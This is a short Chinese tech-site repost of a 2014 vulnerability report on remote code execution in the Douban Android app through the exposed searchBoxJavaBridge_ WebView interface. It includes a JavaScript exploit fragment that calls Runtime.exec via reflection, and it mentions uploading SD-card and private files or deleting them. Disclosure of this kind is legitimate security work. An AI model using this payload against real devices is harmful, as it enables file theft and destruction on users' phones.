知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

豆瓣andriod终端远程代码执行

发布时间:2014-04-28 12:22:00作者:知识屋

豆瓣手机由于未做限制导致searchBoxBridge_导出,在现在android 4.0手机上测试通过,由于android 4.0手机使用量目前最大

构造exploit部分内容如下:(文件)


<script>

function execute(cmdArgs)

{

 

alert(typeof(searchBoxJavaBridge_));

 

return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

 

}

 

详情可见http://50.56.33.56/blog/?p=314

或者其实现中文版http://drops.wooyun.org/papers/548

在android 4.0上测试,





 


这个是已知问题了,调用后可以执行命令,可以做很多事情,例如上传sd卡文件,上传私有目录下的可读文件、删除文件等等。
修复方案:
你们最专业

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜